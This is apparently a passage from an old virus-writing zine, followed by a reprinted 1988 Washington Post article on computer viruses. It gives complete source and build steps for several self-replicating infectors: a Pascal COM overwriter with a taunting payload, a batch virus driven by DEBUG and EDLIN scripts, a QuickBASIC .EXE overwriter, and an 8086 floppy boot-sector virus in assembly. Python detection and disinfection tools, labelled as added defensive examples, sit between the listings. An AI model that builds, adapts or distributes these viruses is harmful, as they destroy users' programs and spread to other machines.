    Writeln('');                        {Give a lot of smiles}
    Writeln('');
    Writeln(' ');
    Writeln(' ATTENTION: ');
    Writeln(' I have been elected to inform you that throughout your process of ');
    Writeln(' collecting and executing files, you have accidentally [CP437 glyphs] ');
    Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
    Writeln(' be; YES, it CAN be, a [CP437 glyphs]s has infected your system. Now what do ');
    Writeln(' you have to say about that? HAHAHAHA. Have [CP437 glyphs] with this one and ');
    Writeln(' remember, there is NO cure for ');
    Writeln(' ');
    { Eight Writeln lines of a CP437 block-graphic "AIDS" banner followed here;  }
    { the glyphs did not survive this transcription and are not reproduced.     }
    Writeln(' ');
    Writeln(' ');
    REPEAT
      LOOPVAR:=0;
    UNTIL LOOPVAR=1;
  end;
End.

{ Although this is a primitive virus, it's effective.  }
{ In this virus only the .COM                          }
{ files are infected. It's about 13K and it will       }
{ change the date entry.                               }

[2.7]

Batch Viruses
-------------

Who would have thought that viruses could live in a BATCH file? The virus we
are about to see relies on two standard MS-DOS tools, DEBUG and EDLIN, to do
its work.

Name: VR.BAT

echo = off          ( Self explanatory )
ctty nul            ( This is important: console output is turned off )
path c:\msdos       ( May differ on other systems )
dir *.com/w>ind     ( The directory is written to "ind", name entries ONLY )

edlin ind<1         ( "ind" is processed with EDLIN so only file names remain )
debug ind<2         ( A new batch program is created with DEBUG )
edlin name.bat<3    ( This batch file is brought into executable form by EDLIN )
ctty con            ( The console is assigned again )
name                ( The newly created NAME.BAT is called )

In addition to this batch file there are three command (script) files, here
named 1, 2 and 3, which are fed to EDLIN and DEBUG through input redirection.

Here is the first command file:
-------------------------------
Name: 1

1,4d                ( Lines 1-4 of the "ind" file are deleted )
e                   ( Save file )

Here is the second command file:
--------------------------------
Name: 2

m100,10b,f000       ( First program name is moved to address F000H to save it )

e108 ".BAT"         ( Extension of the file name is changed to .BAT )
m100,10b,f010       ( File name is saved again )
e100 "DEL "         ( DEL command is written to address 100H )
mf000,f00b,104      ( Original file name is written after this command )
e10c 2e             ( Period is placed in front of the extension )
e110 0d,0a          ( Carriage return + line feed )
mf010,f020,11f      ( Modified file name is moved from the buffer area to 11FH )
e112 "COPY \VR.BAT" ( COPY command is now placed in front of the file name )
e12b 0d,0a          ( COPY command terminated with carriage return + lf )
rcx                 ( The CX register, the length to write, is ... )
2c                  ( set to 2CH )
nname.bat           ( Name it NAME.BAT )
w                   ( Write )
q                   ( quit )

The third command file must be printed as a hex dump because it contains
2 control characters (1Ah = Control-Z) and is therefore not entirely printable.

Hex dump of the third command file:
-----------------------------------
Name: 3

0100  31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79   1,1?R ..nyyyyyyy
0110  79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79   y).2,2?R ..nnyyy
0120  79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00   yyyy).E.........

In order for this virus to work, VR.BAT must be in the root directory. This
program only affects .COM files.

[2.8]

Viruses in Basic
----------------

BASIC is a capable language, yet people often dismiss it as too limited to be
of any use in writing something like a virus. They are wrong. Let us take a
look at a BASIC virus published by R. Burger in 1987. It is an overwriting
virus: it uses SHELL to hand commands to MS-DOS (COMMAND.COM) and infects .EXE
files by copying itself over them. To build it, compile the source with
Microsoft QuickBASIC, note the length of the compiled and linked .EXE file, and
edit the source so that the LENGHTVIR variable holds that length. At run time
BV3.EXE must be in the current directory and COMMAND.COM must be available, the
LENGHTVIR variable must match the length of the linked program, and remember
to use the /e parameter when compiling.

10 REM ** DEMO
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
30 REM ** BASIC DOESNT SUCK
40 REM ** NO KIDDING
50 ON ERROR GOTO 670
60 REM *** LENGHTVIR MUST BE SET **
70 REM *** TO THE LENGTH OF THE **
80 REM *** LINKED PROGRAM ***
90 LENGHTVIR=2641
100 VIRROOT$="BV3.EXE"
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
130 SHELL "DIR *.EXE>INH"
140 REM ** OPEN "INH" FILE AND READ NAMES **
150 OPEN "R",1,"INH",32000
160 GET #1,1
170 LINE INPUT#1,ORIGINAL$
180 LINE INPUT#1,ORIGINAL$
190 LINE INPUT#1,ORIGINAL$
200 LINE INPUT#1,ORIGINAL$
210 ON ERROR GOTO 670
220 CLOSE#2
230 F=1:LINE INPUT#1,ORIGINAL$
240 REM ** "%" IS THE MARKER OF THE BV3
250 REM ** "%" IN THE NAME MEANS
260 REM ** INFECTED COPY PRESENT
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
290 EXTENSION$=MID$(ORIGINAL$,9,13)
300 MID$(EXTENSION$,1,1)="."
310 REM *** CONCATENATE NAMES INTO FILENAMES **
320 F=F+1
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$(ORIGINAL$,F,1)="." OR F=13 THEN GOTO 350
340 GOTO 320
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
360 ON ERROR GOTO 210
365 TEST$=""
370 REM ++ OPEN FILE FOUND +++
380 OPEN "R",2,ORIGINAL$,LENGHTVIR
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
400 GET #2,2
410 LINE INPUT#1,TEST$
420 CLOSE#2
431 REM ++ CHECK IF PROGRAM IS ILL ++
440 REM ++ "%" AT THE END OF THE FILE MEANS..
450 REM ++ FILE IS ALREADY SICK ++
460 REM IF MID$(TEST$,2,1)="%" THEN GOTO 210
470 CLOSE#1
480 ORIGINALS$=ORIGINAL$
490 MID$(ORIGINALS$,1,1)="%"
499 REM ++++ SAVE "HEALTHY" PROGRAM ++++
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
520 SHELL C$
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
540 C$="COPY "+VIRROOT$+ORIGINAL$
550 SHELL C$
560 REM *** APPEND VIRUS MARKER ***
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
580 WRITE#1,ORIGINALS$
590 CLOSE#1
630 REM ++ OUTPUT MESSAGE ++
640 PRINT "INFECTION IN " ;ORIGINAL$; " !! BE WARE !!"
650 SYSTEM
660 REM ** VIRUS ERROR MESSAGE
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
680 END

This BASIC virus attacks only .EXE files. After it runs you will find an "INH"
file holding the directory listing, and a file such as %SORT.EXE: programs
whose names start with "%" are NOT infected; they are the backup copies of the
original programs.

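The two file infectors above leave fixed, recognizable traces: AIDS stores its
42-character Turbo Pascal Warning string at CS:0180h, which is file offset 80h
of a COM image (a length byte 2Ah followed by the text), and overwrites the host
from offset 0 with Succ(VirusSize shr 7) 128-byte blocks, i.e. 13952 bytes; the
BASIC virus renames the original to a "%"-prefixed backup and appends that name,
quoted and CR/LF-terminated by WRITE#, to the end of the infected .EXE. The
following scanner is an added example written for this edition, not code from
CPI or from either listing; it does not reproduce the viruses, it only reports
files carrying those traces. The directory-walk and the sample bytes used in its
self-test are constructed here.

```python
"""Scan a directory for the fingerprints of the AIDS (Number One) COM infector
and R. Burger's BASIC .EXE overwriter as described in CPI #2.

Added example; not code from the zine. Only the marker layout is taken from
the listings, nothing of the infection logic is reproduced.
"""
import os

# AIDS: Warning is a Turbo Pascal String[42] at CS:0180h -> file offset 0x80.
# A Pascal string is its length byte followed by the characters, and the virus
# compares all 43 bytes, so the length byte is part of the marker.
AIDS_WARNING = b"This File Has Been Infected By AIDS! HaHa!"
AIDS_MARKER_OFFSET = 0x80
AIDS_MARKER = bytes([len(AIDS_WARNING)]) + AIDS_WARNING

# VirusSize = 13847; BlockWrite(Go, ProgramStart, Succ(VirusSize shr 7)) at
# position 0 writes this many bytes over the host. Hosts longer than that keep
# their tail; shorter hosts grow to exactly this size.
AIDS_OVERWRITE_LEN = ((13847 >> 7) + 1) * 128   # 13952

# BASIC virus: WRITE#1,ORIGINALS$ appends "%NAME.EXT" in quotes plus CR LF.
BASIC_TAIL_MAX = 1 + 13 + 1 + 2   # quote, 8.3 name with % prefix, quote, CRLF


def aids_infected(data: bytes) -> bool:
    """True if a COM image carries the AIDS marker at offset 0x80."""
    end = AIDS_MARKER_OFFSET + len(AIDS_MARKER)
    return len(data) >= end and data[AIDS_MARKER_OFFSET:end] == AIDS_MARKER


def aids_original_tail(data: bytes) -> bytes:
    """Bytes of the host that survived the overwrite (empty if none)."""
    return data[AIDS_OVERWRITE_LEN:] if aids_infected(data) else b""


def basic_virus_marker(data: bytes):
    """Return the quoted %NAME the BASIC virus appended, or None."""
    tail = data[-BASIC_TAIL_MAX:]
    if not tail.endswith(b"\r\n"):
        return None
    body = tail[:-2]
    start = body.rfind(b'"%')
    if start == -1 or not body.endswith(b'"'):
        return None
    name = body[start + 1:-1]            # strip the quotes
    if not 2 <= len(name) <= 13:
        return None
    return name.decode("ascii", "replace")


def scan_dir(path: str) -> dict:
    """Walk path and report suspicious files by category."""
    report = {"aids_com": [], "basic_exe": [], "basic_backup": []}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            upper = name.upper()
            try:
                with open(full, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            if upper.endswith(".COM") and aids_infected(data):
                report["aids_com"].append(full)
            if upper.endswith(".EXE"):
                if upper.startswith("%"):
                    report["basic_backup"].append(full)
                elif basic_virus_marker(data):
                    report["basic_exe"].append(full)
    return report


if __name__ == "__main__":
    import json
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    print(json.dumps(scan_dir(target), indent=2))
```

A "%"-prefixed .EXE is the clean original and can simply be renamed back over
the infected file; an AIDS-marked COM file cannot be repaired, because the first
13952 bytes of the host were overwritten in place, as the author notes above.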
;[2.9]
;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety.                           ;
; It replicates to the boot sector of a floppy disk and when it gains control
; it will move itself to upper memory.  It redirects the keyboard        ;
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time   ;
; it will attempt to infect any floppy it finds in drive A:.             ;
; It keeps the real boot sector at track 39, sector 8, head 0            ;
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus                      ;
; will die. It also contains no anti detection mechanisms as does the    ;
; BRAIN virus.  It apparently uses head 0, sector 8 and not head 1       ;
; sector 9 because this is common to all floppy formats both single      ;
; sided and double sided.  It does not contain any malevolent TROJAN     ;
; HORSE code.  It does appear to contain a count of how many times it    ;
; has infected other diskettes although this is harmless and the count   ;
; is never accessed.                                                     ;
;                                                                        ;
; Things to note about this virus:                                       ;
; It can not only live through an ALT-CTRL-DEL reboot command, but this  ;
; is its primary (only for that matter) means of reproduction to other   ;
; floppy diskettes.  The only way to remove it from an infected system   ;
; is to turn the machine off and reboot an uninfected copy of DOS.       ;
; It is even resident when no floppy is booted but BASIC is loaded       ;
; instead.  Then when ALT-CTRL-DEL is pressed from inside of BASIC,      ;
; it activates and infects the floppy from which the user is             ;
; attempting to boot.                                                    ;
;                                                                        ;
; Also note that because of the POP CS command used to pass control to   ;
; itself in upper memory, this virus does not work on 80286              ;
; machines (POP CS is not a valid 80286 instruction).                    ;
;                                                                        ;
; If your assembler will not allow the POP CS command to execute, replace;
; the POP CS command with a NOP and then assemble it, then debug that    ;
; part of the code and place POP CS in place of NOP at that section.     ;
;                                                                        ;
; The Norton Utilities can be used to identify infected diskettes by     ;
; looking at the boot sector and the DOS SYS utility can be used to      ;
; remove it (unlike the Pakistani Brain).                                ;
;-----------------------------------------------------------------------;
;
        ORG     7C00H                   ;
;
TOS     LABEL   WORD                    ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset) ;
; 2. Save a copy of the first 32 interrupt vectors to top of memory too  ;
; 3. Redirect int 9 (keyboard) to ourself in top of memory               ;
; 4. Jump to ourself at top of memory                                    ;
; 5. Load and execute REAL boot sector from track 39, head 0, sector 8   ;
;-----------------------------------------------------------------------;
BEGIN:  CLI                             ;INITIALIZE STACK
        XOR     AX,AX                   ;
        MOV     SS,AX                   ;
        MOV     SP,offset TOS           ;
        STI                             ;
;
        MOV     BX,0040H                ;ES = TOP OF MEMORY - (7C00H+512)
        MOV     DS,BX                   ;
        MOV     AX,[0013H]              ;
        MUL     BX                      ;
        SUB     AX,07E0H                ; (7C00H+512)/16
        MOV     ES,AX                   ;
;
        PUSH    CS                      ;DS = CS
        POP     DS                      ;
;
        CMP     DI,3456H                ;IF THE VIRUS IS REBOOTING...
        JNE     B_10                    ;
        DEC     Word Ptr [COUNTER_1]    ;...LOW&HI:COUNTER_1--
;
B_10:   MOV     SI,SP                   ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
        MOV     DI,SI                   ;
        MOV     CX,512                  ;
        CLD                             ;
        REP     MOVSB                   ;
;
        MOV     SI,CX                   ;CX=0 ;SAVE FIRST 32 INT VECTOR ADDRESSES TO
        MOV     DI,offset BEGIN - 128   ; 128 BYTES BELOW OUR HI CODE
        MOV     CX,128                  ;
        REP     MOVSB                   ;
;
        CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
;
        PUSH    ES                      ;ES=HI ; JUMP TO OUR HI CODE WITH
        POP     CS                      ; (8086 ONLY, SEE HEADER NOTE)
;
        PUSH    DS                      ;DS=0 ; ES = DS
        POP     ES                      ;
;
        MOV     BX,SP                   ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
        MOV     DX,CX                   ;CX=0 ;DRIVE A: HEAD 0
        MOV     CX,2708H                ; TRACK 39 (CH=27H), SECTOR 8
        MOV     AX,0201H                ; READ SECTOR
        INT     13H                     ; (common to 8/9 sect. 1/2 sided!)
        JB      $                       ; HANG IF ERROR
;
        JMP     JMP_BOOT                ;JMP 0000:7C00
;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR                                        ;
;                                                                        ;
; ON ENTRY:     DS = 0                                                   ;
;               ES = WHERE TO SAVE OLD_09 & (HI)                         ;
;                    WHERE NEW_09 IS (HI)                                ;
;-----------------------------------------------------------------------;
PUT_NEW_09:                             ;
        DEC     Word Ptr [0413H]        ;TOP OF MEMORY (0040:0013) -= 1024
;
        MOV     SI,9*4                  ;COPY INT 9 VECTOR TO
        MOV     DI,offset OLD_09        ; OLD_09 (IN OUR HI CODE!)
        MOV     CX,0004                 ;
;
        CLI                             ;
        REP     MOVSB                   ;
        MOV     Word Ptr [9*4],offset NEW_09
        MOV     [(9*4)+2],ES            ;
        STI                             ;
;
        RET                             ;
;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR                               ;
;-----------------------------------------------------------------------;
ACK_KEYBD:                              ;
        IN      AL,61H                  ;RESET KEYBOARD THEN CONTINUE
        MOV     AH,AL                   ;
        OR      AL,80H                  ;
        OUT     61H,AL                  ;
        XCHG    AL,AH                   ;
        OUT     61H,AL                  ;
        JMP     RBOOT                   ;
;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION                            ;
; REASON UNKNOWN                                                         ;
;-----------------------------------------------------------------------;
TABLE   DB      27H,0,1,2               ;FORMAT INFORMATION FOR TRACK 39
        DB      27H,0,2,2               ; (CURRENTLY NOT USED)
        DB      27H,0,3,2               ;
        DB      27H,0,4,2               ;
        DB      27H,0,5,2               ;
        DB      27H,0,6,2               ;
        DB      27H,0,7,2               ;
        DB      27H,0,8,2               ;
;
;A7C9A  LABEL   BYTE                    ;
        DW      00024H                  ;NOT USED
        DB      0ADH                    ;
        DB      07CH                    ;
        DB      0A3H                    ;
        DW      00026H                  ;
;
;L7CA1:                                 ;
        POP     CX                      ;NOT USED
        POP     DI                      ;
        POP     SI                      ;
        POP     ES                      ;
        POP     DS                      ;
        POP     AX                      ;
        POPF                            ;
        JMP     1111:1111               ;
;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ...                                           ;
; IF ALT & CTRL & ? THEN ...                                             ;
;-----------------------------------------------------------------------;
NEW_09: PUSHF                           ;
        STI                             ;
;
        PUSH    AX                      ;
        PUSH    BX                      ;
        PUSH    DS                      ;
;
        PUSH    CS                      ;DS=CS
        POP     DS                      ;
;
        MOV     BX,Word Ptr [ALT_CTRL]  ;BX=SCAN CODE LAST TIME
        IN      AL,60H                  ;GET SCAN CODE
        MOV     AH,AL                   ;SAVE IN AH
        AND     AX,887FH                ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
;
        CMP     AL,1DH                  ;IS IT A [CTRL]...
        JNE     N09_10                  ;...JUMP IF NO
        MOV     BL,AH                   ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
        JMP     N09_30                  ;
;
N09_10: CMP     AL,38H                  ;IS IT AN [ALT]...
        JNE     N09_20                  ;...JUMP IF NO
        MOV     BH,AH                   ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
        JMP     N09_30                  ;
;
N09_20: CMP     BX,0808H                ;IF (CTRL DOWN & ALT DOWN)...
        JNE     N09_30                  ;...JUMP IF NO
;
        CMP     AL,17H                  ;IF [I]...
        JE      N09_X0                  ;...JUMP IF YES
        CMP     AL,53H                  ;IF [DEL]...
        JE      ACK_KEYBD               ;...JUMP IF YES
;
N09_30: MOV     [ALT_CTRL],BX           ;SAVE SCAN CODE FOR NEXT TIME
;
N09_90: POP     DS                      ;
        POP     BX                      ;
        POP     AX                      ;
        POPF                            ;
;
        DB      0EAH                    ;JMP F000:E987
OLD_09  DW      ?                       ;
        DW      0F000H                  ;
;
N09_X0: JMP     N09_X1                  ;
;
;-----------------------------------------------------------------------;
;                                                                        ;
;-----------------------------------------------------------------------;
RBOOT:  MOV     DX,03D8H                ;DISABLE COLOR VIDEO !?!?
        MOV     AX,0800H                ;AL=0, AH=DELAY ARG
        OUT     DX,AL                   ;
        CALL    DELAY                   ;
        MOV     [ALT_CTRL],AX           ;AX=0 ;
;
        MOV     AL,3                    ;AH=0 ;SELECT 80x25 COLOR
        INT     10H                     ;
        MOV     AH,2                    ;SET CURSOR POS 0,0
        XOR     DX,DX                   ;
        MOV     BH,DH                   ; PAGE 0
        INT     10H                     ;
;
        MOV     AH,1                    ;SET CURSOR TYPE
        MOV     CX,0607H                ;
        INT     10H                     ;
;
        MOV     AX,0420H                ;DELAY (AL=20H FOR EOI BELOW)
        CALL    DELAY                   ;
;
        CLI                             ;
        OUT     20H,AL                  ;SEND EOI TO INT CONTROLLER
;
        MOV     ES,CX                   ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
        MOV     DI,CX                   ; (REMOVING OUR INT 09 HANDLER!)
        MOV     SI,offset BEGIN - 128   ;
        MOV     CX,128                  ;
        CLD                             ;
        REP     MOVSB                   ;
;
        MOV     DS,CX                   ;CX=0 ;DS=0
;
        MOV     Word Ptr [19H*4],offset NEW_19  ;SET INT 19 VECTOR
        MOV     [(19H*4)+2],CS          ;
;
        MOV     AX,0040H                ;DS = ROM DATA AREA
        MOV     DS,AX                   ;
;
        MOV     [0017H],AH              ;AH=0 ;KBFLAG (SHIFT STATES) = 0
        INC     Word Ptr [0013H]        ;MEMORY SIZE += 1024 (WE'RE NOT ACTIVE)
;
        PUSH    DS                      ;IF BIOS F000:E502 == 21E4...
        MOV     AX,0F000H               ;
        MOV     DS,AX                   ;
        CMP     Word Ptr [0E502H],21E4H ;
        POP     DS                      ;
        JE      R_90                    ;
        INT     19H                     ; IF NOT...REBOOT
;
R_90:   JMP     0F000:0E502H            ;...DO IT ?!?!?!
;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR                                                      ;
;-----------------------------------------------------------------------;
NEW_19: XOR     AX,AX                   ;
;
        MOV     DS,AX                   ;DS=0
        MOV     AX,[0410H]              ;AX=EQUIP FLAG
        TEST    AL,1                    ;IF FLOPPY DRIVES ...
        JNZ     N19_20                  ;...JUMP
N19_10: PUSH    CS                      ;ELSE ES=CS
        POP     ES                      ;
        CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
        INT     18H                     ;LOAD BASIC
;
N19_20: MOV     CX,0004                 ;RETRY COUNT = 4
;
N19_22: PUSH    CX                      ;
        MOV     AH,00                   ;RESET DISK
        INT     13H                     ;
        JB      N19_81                  ;
        MOV     AX,0201H                ;READ BOOT SECTOR
        PUSH    DS                      ;
        POP     ES                      ;
        MOV     BX,offset BEGIN         ;
        MOV     CX,1                    ;TRACK 0, SECTOR 1
        INT     13H                     ;
N19_81: POP     CX                      ;
        JNB     N19_90                  ;
        LOOP    N19_22                  ;
        JMP     N19_10                  ;IF RETRY EXPIRED...LOAD BASIC
;
;-----------------------------------------------------------------------;
; Reinfection segment.                                                   ;
;-----------------------------------------------------------------------;
N19_90: CMP     DI,3456H                ;IF NOT FLAG SET...
        JNZ     RE_INFECT               ;...RE INFECT
;
JMP_BOOT:                               ;PASS CONTROL TO BOOT SECTOR
        JMP     0000:7C00H              ;
;
;-----------------------------------------------------------------------;
; Reinfection Segment.                                                   ;
;-----------------------------------------------------------------------;
RE_INFECT:                              ;
        MOV     SI,offset BEGIN         ;COMPARE BOOT SECTOR JUST LOADED WITH
        MOV     CX,00E6H                ; OURSELF
        MOV     DI,SI                   ;
        PUSH    CS                      ;
        POP     ES                      ;
        CLD                             ;
        REPE    CMPSB                   ;
        JE      RI_12                   ;IF EQUAL (ALREADY INFECTED)...SKIP TO REBOOT
;
        INC     Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
;
        ;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
        MOV     BX,offset TABLE         ;FORMAT INFO
        MOV     DX,0000                 ;DRIVE A: HEAD 0
        MOV     CH,40-1                 ;TRACK 39
        MOV     AH,5                    ;FORMAT
        JMP     RI_10                   ;REMOVE THE FORMAT OPTION FOR NOW !
;
        ; <<< NO EXECUTION PATH TO HERE >>> ;
        JB      RI_80                   ;
;
        ;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10:  MOV     ES,DX                   ;ES:BX = 0000:7C00, HEAD=0
        MOV     BX,offset BEGIN         ;TRACK 39 (CH=27H)
        MOV     CL,8                    ;SECTOR 8
        MOV     AX,0301H                ;WRITE 1 SECTOR
        INT     13H                     ;
;
        PUSH    CS                      ; (ES=CS FOR PUT_NEW_09 BELOW)
        POP     ES                      ;
        JB      RI_80                   ;IF WRITE ERROR...JUMP TO BOOT CODE
;
        MOV     CX,0001                 ;WRITE INFECTED BOOT SECTOR !
        MOV     AX,0301H                ;
        INT     13H                     ;
        JB      RI_80                   ; IF ERROR...JUMP TO BOOT CODE
;
RI_12:  MOV     DI,3456H                ;SET "JUST INFECTED ANOTHER ONE"...
        INT     19H                     ;...FLAG AND REBOOT
;
RI_80:  CALL    PUT_NEW_09              ;SAVE/REDIRECT INT 9 (KEYBOARD)
        DEC     Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDN'T INFECT)
        JMP     JMP_BOOT                ;
;
;-----------------------------------------------------------------------;
;                                                                        ;
;-----------------------------------------------------------------------;
N09_X1: MOV     [ALT_CTRL],BX           ;SAVE ALT & CTRL STATUS
;
        MOV     AX,[COUNTER_1]          ;PUT COUNTER_1 INTO RESET FLAG
        MOV     BX,0040H                ;
        MOV     DS,BX                   ;
        MOV     [0072H],AX              ; 0040:0072 = RESET FLAG
        JMP     N09_90                  ;
;
;-----------------------------------------------------------------------;
; DELAY                                                                  ;
;                                                                        ;
; ON ENTRY AH:CX = LOOP COUNT                                            ;
;-----------------------------------------------------------------------;
DELAY:  SUB     CX,CX                   ;
D_01:   LOOP    $                       ;
        SUB     AH,1                    ;
        JNZ     D_01                    ;
        RET                             ;
;
;-----------------------------------------------------------------------;
;                                                                        ;
;-----------------------------------------------------------------------;
A7DF4   DB      27H,00H,8,2

COUNTER_1 DW    001CH
ALT_CTRL  DW    0
A7DFC   DB      27H,0,8,2

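The header of the listing says an infected diskette can be recognized by
looking at its boot sector and cleaned with SYS, and that the virus parks the
real boot sector at track 39, head 0, sector 8. Given a raw image of the
diskette, both steps can be done offline. The tool below is an added example
written for this edition, not code from the listing or from its author. Its
signature is built from three instructions in the listing whose 8086 encoding
does not depend on the assembler (MOV SP,7C00h is BC 00 7C; CMP DI,3456h is
81 FF 56 34; MOV CX,2708h is B9 08 27); the mapping from image size to floppy
geometry is an assumption covering the 8/9-sector, single/double-sided formats
the listing itself mentions, and the disk image used in the self-test is
constructed, not a captured sample.

```python
"""Detect the CPI #2 floppy boot-sector virus in a raw diskette image and
restore the parked original boot sector.

Added example; not code from the listing. The byte patterns are the
assembler-independent encodings of three instructions in the virus:
    MOV SP,7C00h  -> BC 00 7C       (stack set-up at BEGIN)
    CMP DI,3456h  -> 81 FF 56 34    ("just infected another one" flag test)
    MOV CX,2708h  -> B9 08 27       (track 39, sector 8: parked boot sector)
Geometry by image size is an assumption for the 40-track formats listed.
"""
SECTOR = 512
SIGNATURES = (b"\xbc\x00\x7c", b"\x81\xff\x56\x34", b"\xb9\x08\x27")

# image size -> (heads, sectors per track); all are 40-track formats
GEOMETRY = {
    163840: (1, 8),   # 160K, single sided, 8 sectors
    184320: (1, 9),   # 180K, single sided, 9 sectors
    327680: (2, 8),   # 320K, double sided, 8 sectors
    368640: (2, 9),   # 360K, double sided, 9 sectors
}

# Where the virus keeps the real boot sector (from the listing's header).
SAVED_CYL, SAVED_HEAD, SAVED_SECTOR = 39, 0, 8


def chs_to_offset(cyl: int, head: int, sector: int, heads: int, spt: int) -> int:
    """Byte offset of a CHS address (sectors are 1-based) in a raw image."""
    lba = (cyl * heads + head) * spt + (sector - 1)
    return lba * SECTOR


def looks_infected(data: bytes) -> bool:
    """True if all three code patterns occur in the first sector."""
    boot = data[:SECTOR]
    return all(sig in boot for sig in SIGNATURES)


def saved_boot_sector(image: bytes) -> bytes:
    """The sector at track 39 / head 0 / sector 8 for this image's geometry."""
    heads, spt = GEOMETRY[len(image)]
    off = chs_to_offset(SAVED_CYL, SAVED_HEAD, SAVED_SECTOR, heads, spt)
    return image[off:off + SECTOR]


def disinfect(image: bytes) -> bytes:
    """Return a copy of image with the parked boot sector moved back to LBA 0.

    Raises ValueError when the image is not a supported size, does not carry
    the virus, or when the parked copy is gone. The listing warns the parked
    sector is not marked bad in the FAT, so a file may have overwritten it;
    in that case SYS from a clean DOS diskette is the only repair.
    """
    if len(image) not in GEOMETRY:
        raise ValueError("unsupported image size %d" % len(image))
    if not looks_infected(image):
        raise ValueError("boot sector does not match the virus")
    original = saved_boot_sector(image)
    if looks_infected(original) or original == bytes(SECTOR):
        raise ValueError("parked boot sector is missing or overwritten")
    return original + image[SECTOR:]


if __name__ == "__main__":
    import sys
    path = sys.argv[1]
    with open(path, "rb") as fh:
        img = fh.read()
    if not looks_infected(img):
        print("%s: boot sector does not match" % path)
    else:
        with open(path + ".clean", "wb") as fh:
            fh.write(disinfect(img))
        print("%s: infected; cleaned image written to %s.clean" % (path, path))
```

The parked copy at track 39 is left in place by design: it is harmless data
once sector 0 is restored, and keeping it lets the operation be compared or
repeated. Run the tool against an image taken with a sector-level copy, never
against a diskette in a machine that may itself be running the resident code.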
[2.10]
|
||
|
||
Virili In The News
|
||
------------------
|
||
This section deals with a large amount of stuff, basically, a bunch
|
||
of viruses and stuff that have been in the newspapers and magazines cuz
|
||
all of the damage they have done. Enjoy....
|
||
|
||
|
||
There's A Virus In My Software
|
||
|
||
Mischief-makers at the computer
|
||
are deliberately endangering data
|
||
|
||
By Philip J. Hilts
|
||
|
||
Washington Post Staff Writer
|
||
|
||
The Washington Post Weekly Edition, Page #38. May 23-29, 1988.
|
||
|
||
Tiny programs that are deliberately cause mischief are epidemic among
|
||
computers and causing nervousness among those who monitor them. Since the
|
||
first tests of the notion in 1983 that machines can catch and spread
|
||
"information diseases," the computer world has reached the point at which as
|
||
many as thirty instances of "computer virus" have been reported in the past
|
||
year, affecting tens of thousands of U.S. computers alone.
|
||
|
||
Such viruses have been found at the National Aeronautics and Space
|
||
Administration, International Business Machines Corporation, the House of
|
||
Representatives, at least six universities, several major computer networks
|
||
such as Comp-u-serve and several businesses, including the world's largest
|
||
computer-service company, the $4.4 billion Electronic Data Systems
|
||
Corporation of Dallas, Texas.
|
||
|
||
Written by malicious programmers, the viruses are sneaked into computer
|
||
systems by piggybacking them on legitimate programs and messages. There,
|
||
they may be passed along or instructed to wait until a prearranged moment to
|
||
burst forth and destroy data.
|
||
|
||
Hundreds of computers at the Hebrew University of Jerusalem and other
|
||
places in Israel were hit last fall by a virus designed to spread and then,
|
||
in one swipe on a Friday the thirteenth, destroy all data in any computer it
|
||
could reach.
|
||
|
||
If not for an error by it's author, who has not been caught, the virus
|
||
could have caused devastation among micro-computers in Israel and other
|
||
nations. The virus did not check to see whether it already had infected a
|
||
program and so infected some computers hundreds of times, crowding their
|
||
memories enough to call attention to itself.
|
||
|
||
In a seven-month campaign, programmers in Israel hastened to find
|
||
infected machines and ensure that the smallest number would be affected
|
||
before Friday, May 13th. Officials say they initially thought that the
|
||
infection was connected with the anniversary of the last day that Palestine
|
||
existed as a political entity but subsequently decided that it most likely
|
||
involved just Friday the thirteenth.
|
||
|
||
Apparently, the campaign was successful; there has been no word of
|
||
substantial damage. This past Friday the thirteenth is this year's only such
|
||
day.
|
||
|
||
At the Aldus Corporation of Seattle, Washington, a major software maker,
|
||
executives are huddling with lawyers to try to determine whether
|
||
international spread of such diseases is illegal. No virus cases have been
|
||
taken to court.
|
||
|
||
At N.A.S.A. headquarters in Washington, several hundred computers had to
|
||
be resuscitated after being infected. N.A.S.A. officials have taken
|
||
precautions and reminded their machines' users to follow routine computer
|
||
hygiene: Don't trust foreign data or strange machines.
|
||
|
||
